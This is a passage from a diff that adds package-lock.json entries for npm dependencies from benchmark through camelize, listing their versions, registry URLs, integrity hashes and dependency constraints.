"https://registry.npmjs.org/benchmark/-/benchmark-2.1.4.tgz", + "integrity": "sha512-l9MlfN4M1K/H2fbhfMy3B7vJd6AGKJVQn2h6Sg/Yx+KckoUA7ewS5Vv6TjSq18ooE1kS9hhAlQRH3AkXIh/aOQ==", + "dev": true, + "dependencies": { + "lodash": "^4.17.4", + "platform": "^1.3.3" + } + }, + "node_modules/benny": { + "version": "3.7.1", + "resolved": "https://registry.npmjs.org/benny/-/benny-3.7.1.tgz", + "integrity": "sha512-USzYxODdVfOS7JuQq/L0naxB788dWCiUgUTxvN+WLPt/JfcDURNNj8kN/N+uK6PDvuR67/9/55cVKGPleFQINA==", + "dev": true, + "dependencies": { + "@arrows/composition": "^1.0.0", + "@arrows/dispatch": "^1.0.2", + "@arrows/multimethod": "^1.1.6", + "benchmark": "^2.1.4", + "common-tags": "^1.8.0", + "fs-extra": "^10.0.0", + "json2csv": "^5.0.6", + "kleur": "^4.1.4", + "log-update": "^4.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/benny/node_modules/commander": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-6.2.1.tgz", + "integrity": "sha512-U7VdrJFnJgo4xjrHpTzu0yrHPGImdsmD95ZlgYSEajAn2JKzDhDTPG9kBTefmObL2w/ngeZnilk+OV9CG3d7UA==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/benny/node_modules/json2csv": { + "version": "5.0.7", + "resolved": "https://registry.npmjs.org/json2csv/-/json2csv-5.0.7.tgz", + "integrity": 
"sha512-YRZbUnyaJZLZUJSRi2G/MqahCyRv9n/ds+4oIetjDF3jWQA7AG7iSeKTiZiCNqtMZM7HDyt0e/W6lEnoGEmMGA==", + "dev": true, + "dependencies": { + "commander": "^6.1.0", + "jsonparse": "^1.3.1", + "lodash.get": "^4.4.2" + }, + "bin": { + "json2csv": "bin/json2csv.js" + }, + "engines": { + "node": ">= 10", + "npm": ">= 6.13.0" + } + }, + "node_modules/better-opn": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/better-opn/-/better-opn-3.0.2.tgz", + "integrity": "sha512-aVNobHnJqLiUelTaHat9DZ1qM2w0C0Eym4LPI/3JxOnSokGVdsl1T1kN7TFvsEAD8G47A6VKQ0TVHqbBnYMJlQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "open": "^8.0.4" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/big.js": { + "version": "6.1.1", + "resolved": "https://registry.npmjs.org/big.js/-/big.js-6.1.1.tgz", + "integrity": "sha512-1vObw81a8ylZO5ePrtMay0n018TcftpTA5HFKDaSuiUDBo8biRBtjIobw60OpwuvrGk+FsxKamqN4cnmj/eXdg==", + "engines": { + "node": "*" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/bigjs" + } + }, + "node_modules/bignumber.js": { + "version": "9.0.2", + "resolved": "https://registry.npmjs.org/bignumber.js/-/bignumber.js-9.0.2.tgz", + "integrity": "sha512-GAcQvbpsM0pUb0zw1EI0KhQEZ+lRwR5fYaAp3vPOYuP7aDvGy6cVN6XHLauvF8SOga2y0dcLcjt3iQDTSEliyw==", + "engines": { + "node": "*" + } + }, + "node_modules/binary-extensions": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/binary-extensions/-/binary-extensions-2.2.0.tgz", + "integrity": "sha512-jDctJ/IVQbZoJykoeHbhXpOlNBqGNcwXJKJog42E5HDPUwQTSdjCHdihjj0DlnheQ7blbT6dHOafNAiS8ooQKA==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/bindings": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/bindings/-/bindings-1.5.0.tgz", + "integrity": "sha512-p2q/t/mhvuOj/UeLlV6566GD/guowlr0hHxClI0W9m7MWYkL1F0hLo+0Aexs9HSPCtR1SXQ0TD3MMKrXZajbiQ==", + "dependencies": { + "file-uri-to-path": "1.0.0" + } + }, + "node_modules/bintrees": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/bintrees/-/bintrees-1.0.1.tgz", + "integrity": "sha1-DmVcm5wkNeqraL9AJyJtK1WjRSQ=" + }, + "node_modules/bl": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/bl/-/bl-4.1.0.tgz", + "integrity": "sha512-1W07cM9gS6DcLperZfFSj+bWLtaPGSOHWhPiGzXmvVJbRLdG82sH/Kn8EtW1VqWVA54AKf2h5k5BbnIbwF3h6w==", + "dependencies": { + "buffer": "^5.5.0", + "inherits": "^2.0.4", + "readable-stream": "^3.4.0" + } + }, + "node_modules/bl/node_modules/buffer": { + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", + "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.1.13" + } + }, + "node_modules/blob-util": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/blob-util/-/blob-util-2.0.2.tgz", + "integrity": "sha512-T7JQa+zsXXEa6/8ZhHcQEW1UFfVM49Ts65uBkFL6fz2QmrElqmbajIDJvuA0tEhRe5eIjpV9ZF+0RfZR9voJFQ==", + "dev": true + }, + "node_modules/bluebird": { + "version": "3.7.2", + "resolved": "https://registry.npmjs.org/bluebird/-/bluebird-3.7.2.tgz", + "integrity": "sha512-XpNj6GDQzdfW+r2Wnn7xiSAd7TM3jzkxGXBGTtWKuSXv1xUV+azxAm8jdWZN06QTQk+2N2XB9jRDkvbmQmcRtg==" + }, + 
"node_modules/blueimp-md5": { + "version": "2.19.0", + "resolved": "https://registry.npmjs.org/blueimp-md5/-/blueimp-md5-2.19.0.tgz", + "integrity": "sha512-DRQrD6gJyy8FbiE4s+bDoXS9hiW3Vbx5uCdwvcCf3zLHL+Iv7LtGHLpr+GZV8rHG8tK766FGYBwRbu8pELTt+w==", + "dev": true + }, + "node_modules/body-parser": { + "version": "1.20.3", + "resolved": "https://registry.npmjs.org/body-parser/-/body-parser-1.20.3.tgz", + "integrity": "sha512-7rAxByjUMqQ3/bHJy7D6OGXvx/MMc4IqBn/X0fcM1QUcAItpZrBEYhWGem+tzXH90c+G01ypMcYJBO9Y30203g==", + "dependencies": { + "bytes": "3.1.2", + "content-type": "~1.0.5", + "debug": "2.6.9", + "depd": "2.0.0", + "destroy": "1.2.0", + "http-errors": "2.0.0", + "iconv-lite": "0.4.24", + "on-finished": "2.4.1", + "qs": "6.13.0", + "raw-body": "2.5.2", + "type-is": "~1.6.18", + "unpipe": "1.0.0" + }, + "engines": { + "node": ">= 0.8", + "npm": "1.2.8000 || >= 1.4.16" + } + }, + "node_modules/body-parser/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/body-parser/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/body-parser/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=" + }, + "node_modules/body-parser/node_modules/on-finished": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/bonjour-service": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/bonjour-service/-/bonjour-service-1.3.0.tgz", + "integrity": "sha512-3YuAUiSkWykd+2Azjgyxei8OWf8thdn8AITIog2M4UICzoqfjlqr64WIjEXZllf/W6vK1goqleSR6brGomxQqA==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "multicast-dns": "^7.2.5" + } + }, + "node_modules/boolbase": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/boolbase/-/boolbase-1.0.0.tgz", + "integrity": "sha1-aN/1++YMUes3cl6p4+0xDcwed24=", + "dev": true + }, + "node_modules/bootstrap": { + "version": "3.4.1", + "resolved": "https://registry.npmjs.org/bootstrap/-/bootstrap-3.4.1.tgz", + "integrity": "sha512-yN5oZVmRCwe5aKwzRj6736nSmKDX7pLYwsXiCj/EYmo16hODaBiT4En5btW/jhBF/seV+XMx3aYwukYC3A49DA==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/bootstrap-5": { + "name": "bootstrap", + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/bootstrap/-/bootstrap-5.3.3.tgz", + "integrity": "sha512-8HLCdWgyoMguSO9o+aH+iuZ+aht+mzW0u3HIMzVu7Srrpv7EBBxTnrFlSCskwdY1+EOFQSm7uMJhNQHkdPcmjg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/twbs" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/bootstrap" + } + ], + "peerDependencies": { + "@popperjs/core": "^2.11.8" + } + }, + "node_modules/bowser": { + "version": "2.11.0", + "resolved": 
"https://registry.npmjs.org/bowser/-/bowser-2.11.0.tgz", + "integrity": "sha512-AlcaJBi/pqqJBIQ8U9Mcpc9i8Aqxn88Skv5d+xBX006BY5u8N3mGLHa5Lgppa7L/HfwgwLgZ6NYs+Ag6uUmJRA==" + }, + "node_modules/brace-expansion": { + "version": "1.1.11", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", + "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "dependencies": { + "balanced-match": "^1.0.0", + "concat-map": "0.0.1" + } + }, + "node_modules/braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", + "dependencies": { + "fill-range": "^7.1.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/browser-assert": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/browser-assert/-/browser-assert-1.2.1.tgz", + "integrity": "sha512-nfulgvOR6S4gt9UKCeGJOuSGBPGiFT6oQ/2UBnvTY/5aQ1PnksW72fhZkM30DzoRRv2WpwZf1vHHEr3mtuXIWQ==", + "dev": true + }, + "node_modules/browser-process-hrtime": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/browser-process-hrtime/-/browser-process-hrtime-1.0.0.tgz", + "integrity": "sha512-9o5UecI3GhkpM6DrXr69PblIuWxPKk9Y0jHBRhdocZ2y7YECBFCsHm79Pr3OyR2AvjhDkabFJaDJMYRazHgsow==", + "dev": true + }, + "node_modules/browser-stdout": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/browser-stdout/-/browser-stdout-1.3.1.tgz", + "integrity": "sha512-qhAVI1+Av2X7qelOfAIYwXONood6XlZE/fXaBSmW/T5SzLAmCgzi+eiWE7fUvbHaeNBQH13UftjpXxsfLkMpgw==", + "dev": true, + "license": "ISC" + }, + "node_modules/browserslist": { + "version": "4.24.0", + "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.0.tgz", + "integrity": "sha512-Rmb62sR1Zpjql25eSanFGEhAxcFwfA1K0GuQcLoaJBAcENegrQut3hYdhXFF1obQfiDyqIW/cLM5HSJ/9k884A==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/browserslist" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "caniuse-lite": "^1.0.30001663", + "electron-to-chromium": "^1.5.28", + "node-releases": "^2.0.18", + "update-browserslist-db": "^1.1.0" + }, + "bin": { + "browserslist": "cli.js" + }, + "engines": { + "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" + } + }, + "node_modules/bson": { + "version": "6.10.1", + "resolved": "https://registry.npmjs.org/bson/-/bson-6.10.1.tgz", + "integrity": "sha512-P92xmHDQjSKPLHqFxefqMxASNq/aWJMEZugpCjf+AF/pgcUpMMQCg7t7+ewko0/u8AapvF3luf/FoehddEK+sA==", + "license": "Apache-2.0", + "engines": { + "node": ">=16.20.1" + } + }, + "node_modules/btoa": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/btoa/-/btoa-1.2.1.tgz", + "integrity": "sha512-SB4/MIGlsiVkMcHmT+pSmIPoNDoHg+7cMzmt3Uxt628MTz2487DKSqK/fuhFBrkuqrYv5UCEnACpF4dTFNKc/g==", + "bin": { + "btoa": "bin/btoa.js" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/buffer": { + "version": "4.9.2", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-4.9.2.tgz", + "integrity": "sha512-xq+q3SRMOxGivLhBNaUdC64hDTQwejJ+H0T/NB1XMtTVEwNTrfFF3gAxiyW0Bu/xWEGhjVKgUcMhCrUy2+uCWg==", + "dependencies": { + "base64-js": "^1.0.2", + "ieee754": "^1.1.4", + "isarray": "^1.0.0" + } + }, + "node_modules/buffer-crc32": { + "version": "0.2.13", + 
"resolved": "https://registry.npmjs.org/buffer-crc32/-/buffer-crc32-0.2.13.tgz", + "integrity": "sha1-DTM+PwDqxQqhRUq9MO+MKl2ackI=", + "engines": { + "node": "*" + } + }, + "node_modules/buffer-equal-constant-time": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/buffer-equal-constant-time/-/buffer-equal-constant-time-1.0.1.tgz", + "integrity": "sha1-+OcRMvf/5uAaXJaXpMbz5I1cyBk=" + }, + "node_modules/buffer-from": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", + "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==" + }, + "node_modules/buffer-writer": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/buffer-writer/-/buffer-writer-2.0.0.tgz", + "integrity": "sha512-a7ZpuTZU1TRtnwyCNW3I5dc0wWNC3VR9S++Ewyk2HHZdrO3CQJqSpd+95Us590V6AL7JqUAH2IwZ/398PmNFgw==", + "engines": { + "node": ">=4" + } + }, + "node_modules/buffer/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE=" + }, + "node_modules/bufrw": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/bufrw/-/bufrw-1.3.0.tgz", + "integrity": "sha512-jzQnSbdJqhIltU9O5KUiTtljP9ccw2u5ix59McQy4pV2xGhVLhRZIndY8GIrgh5HjXa6+QJ9AQhOd2QWQizJFQ==", + "dependencies": { + "ansi-color": "^0.2.1", + "error": "^7.0.0", + "hexer": "^1.5.0", + "xtend": "^4.0.0" + }, + "engines": { + "node": ">= 0.10.x" + } + }, + "node_modules/buildcheck": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/buildcheck/-/buildcheck-0.0.6.tgz", + "integrity": "sha512-8f9ZJCUXyT1M35Jx7MkBgmBMo3oHTTBIPLiY9xyL0pl3T5RwcPEY8cUHr5LBNfu/fk6c2T4DJZuVM/8ZZT2D2A==", + "optional": true, + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/builtin-modules": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/builtin-modules/-/builtin-modules-3.3.0.tgz", + "integrity": "sha512-zhaCDicdLuWN5UbN5IMnFqNMhNfo919sH85y2/ea+5Yg9TsTkeZxpL+JLbp6cgYFS4sRLp3YV4S6yDuqVWHYOw==", + "dev": true, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/builtins": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/builtins/-/builtins-4.1.0.tgz", + "integrity": "sha512-1bPRZQtmKaO6h7qV1YHXNtr6nCK28k0Zo95KM4dXfILcZZwoHJBN1m3lfLv9LPkcOZlrSr+J1bzMaZFO98Yq0w==", + "dev": true, + "peer": true, + "dependencies": { + "semver": "^7.0.0" + } + }, + "node_modules/builtins/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "peer": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/builtins/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "peer": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/builtins/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": 
"sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true, + "peer": true + }, + "node_modules/bull": { + "version": "3.29.3", + "resolved": "https://registry.npmjs.org/bull/-/bull-3.29.3.tgz", + "integrity": "sha512-MOqV1dKLy1YQgP9m3lFolyMxaU+1+o4afzYYf0H4wNM+x/S0I1QPQfkgGlLiH00EyFrvSmeubeCYFP47rTfpjg==", + "dependencies": { + "cron-parser": "^2.13.0", + "debuglog": "^1.0.0", + "get-port": "^5.1.1", + "ioredis": "^4.27.0", + "lodash": "^4.17.21", + "p-timeout": "^3.2.0", + "promise.prototype.finally": "^3.1.2", + "semver": "^7.3.2", + "util.promisify": "^1.0.1", + "uuid": "^8.3.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/bull/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/bull/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/bull/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/bull/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/bundle-name": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/bundle-name/-/bundle-name-4.1.0.tgz", + "integrity": "sha512-tjwM5exMg6BGRI+kNmTntNsvdZS1X8BFYS6tnJ2hdH0kVxM6/eVZ2xy+FqStSWvYmtfFMDLIxurorHwDKfDz5Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "run-applescript": "^7.0.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/bunyan": { + "version": "1.8.15", + "resolved": "https://registry.npmjs.org/bunyan/-/bunyan-1.8.15.tgz", + "integrity": "sha512-0tECWShh6wUysgucJcBAoYegf3JJoZWibxdqhTm7OHPeT42qdjkZ29QCMcKwbgU1kiH+auSIasNRXMLWXafXig==", + "engines": [ + "node >=0.10.0" + ], + "bin": { + "bunyan": "bin/bunyan" + }, + "optionalDependencies": { + "dtrace-provider": "~0.8", + "moment": "^2.19.3", + "mv": "~2", + "safe-json-stringify": "~1" + } + }, + "node_modules/busboy": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/busboy/-/busboy-1.6.0.tgz", + "integrity": "sha512-8SFQbg/0hQ9xy3UNTB0YEnsNBbWfhf7RtnzpL7TkBiTBRfrQ9Fxcnz7VJsleJpyp6rVLvXiuORqjlHi5q+PYuA==", + "dependencies": { + "streamsearch": "^1.1.0" + }, + "engines": { + "node": ">=10.16.0" + } + }, + "node_modules/bytes": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz", + "integrity": "sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/c8": { + "version": "7.14.0", + "resolved": 
"https://registry.npmjs.org/c8/-/c8-7.14.0.tgz", + "integrity": "sha512-i04rtkkcNcCf7zsQcSv/T9EbUn4RXQ6mropeMcjFOsQXQ0iGLAr/xT6TImQg4+U9hmNpN9XdvPkjUL1IzbgxJw==", + "dev": true, + "dependencies": { + "@bcoe/v8-coverage": "^0.2.3", + "@istanbuljs/schema": "^0.1.3", + "find-up": "^5.0.0", + "foreground-child": "^2.0.0", + "istanbul-lib-coverage": "^3.2.0", + "istanbul-lib-report": "^3.0.0", + "istanbul-reports": "^3.1.4", + "rimraf": "^3.0.2", + "test-exclude": "^6.0.0", + "v8-to-istanbul": "^9.0.0", + "yargs": "^16.2.0", + "yargs-parser": "^20.2.9" + }, + "bin": { + "c8": "bin/c8.js" + }, + "engines": { + "node": ">=10.12.0" + } + }, + "node_modules/c8/node_modules/rimraf": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", + "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "dev": true, + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/c8/node_modules/yargs": { + "version": "16.2.0", + "resolved": "https://registry.npmjs.org/yargs/-/yargs-16.2.0.tgz", + "integrity": "sha512-D1mvvtDG0L5ft/jGWkLpG1+m0eQxOfaBvTNELraWj22wSVUMWxZUvYgJYcKh6jGGIkJFhH4IZPQhR4TKpc8mBw==", + "dev": true, + "dependencies": { + "cliui": "^7.0.2", + "escalade": "^3.1.1", + "get-caller-file": "^2.0.5", + "require-directory": "^2.1.1", + "string-width": "^4.2.0", + "y18n": "^5.0.5", + "yargs-parser": "^20.2.2" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/c8/node_modules/yargs-parser": { + "version": "20.2.9", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-20.2.9.tgz", + "integrity": "sha512-y11nGElTIV+CT3Zv9t7VKl+Q3hTQoT9a1Qzezhhl6Rp21gJ/IVTW7Z3y9EWXhuUBC2Shnf+DX0antecpAwSP8w==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/cache-base": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/cache-base/-/cache-base-1.0.1.tgz", + "integrity": "sha512-AKcdTnFSWATd5/GCPRxr2ChwIJ85CeyrEyjRHlKxQ56d4XJMGym0uAiKn0xbLOGOl3+yRpOTi484dVCEc5AUzQ==", + "dev": true, + "dependencies": { + "collection-visit": "^1.0.0", + "component-emitter": "^1.2.1", + "get-value": "^2.0.6", + "has-value": "^1.0.0", + "isobject": "^3.0.1", + "set-value": "^2.0.0", + "to-object-path": "^0.3.0", + "union-value": "^1.0.0", + "unset-value": "^1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/cache-flow": { + "version": "1.9.0", + "resolved": "https://registry.npmjs.org/cache-flow/-/cache-flow-1.9.0.tgz", + "integrity": "sha512-oGRBf4bCZbzyKAbZrfSqtfv9+rrDCtSiHihjjc1okmmvIYT0WqPHNq/yh/sDAUBT46RkpxZ4FqaGVrLBagnzgQ==", + "dependencies": { + "cluster": "^0.7.7", + "date-fns": "^2.23.0", + "ioredis": "^4.27.6", + "lru-cache-for-clusters-as-promised": "^1.7.1", + "object-hash": "^2.2.0" + } + }, + "node_modules/cachedir": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/cachedir/-/cachedir-2.3.0.tgz", + "integrity": "sha512-A+Fezp4zxnit6FanDmv9EqXNAi3vt9DWp51/71UEhXukb7QUuvtv9344h91dyAxuTLoSYJFU299qzR3tzwPAhw==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/call-bind": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/call-bind/-/call-bind-1.0.7.tgz", + "integrity": "sha512-GHTSNSYICQ7scH7sZ+M2rFopRoLh8t2bLSW6BbgrtLsahOIB5iyAVJf9GjWK3cYTDaMj4XdBpM1cA6pIS0Kv2w==", + "dependencies": { + "es-define-property": "^1.0.0", + "es-errors": "^1.3.0", + "function-bind": "^1.1.2", + 
"get-intrinsic": "^1.2.4", + "set-function-length": "^1.2.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/call-me-maybe": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-me-maybe/-/call-me-maybe-1.0.2.tgz", + "integrity": "sha512-HpX65o1Hnr9HH25ojC1YGs7HCQLq0GCOibSaWER0eNpgJ/Z1MZv2mTc7+xh6WOPxbRVcmgbv4hGU+uSQ/2xFZQ==" + }, + "node_modules/callsites": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", + "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", + "engines": { + "node": ">=6" + } + }, + "node_modules/camel-case": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/camel-case/-/camel-case-4.1.2.tgz", + "integrity": "sha512-gxGWBrTT1JuMx6R+o5PTXMmUnhnVzLQ9SNutD4YqKtI6ap897t3tKECYla6gCWEkplXnlNybEkZg9GEGxKFCgw==", + "dev": true, + "dependencies": { + "pascal-case": "^3.1.2", + "tslib": "^2.0.3" + } + }, + "node_modules/camelcase": { + "version": "6.3.0", + "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", + "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/camelcase-keys": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/camelcase-keys/-/camelcase-keys-4.2.0.tgz", + "integrity": "sha1-oqpfsa9oh1glnDLBQUJteJI7m3c=", + "dependencies": { + "camelcase": "^4.1.0", + "map-obj": "^2.0.0", + "quick-lru": "^1.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/camelcase-keys/node_modules/camelcase": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-4.1.0.tgz", + "integrity": "sha1-1UVjW+HjPFQmScaRc+Xeas+uNN0=", + "engines": { + "node": ">=4" + } + }, + "node_modules/camelize": { + "version": "1.0.0", + "resolved": 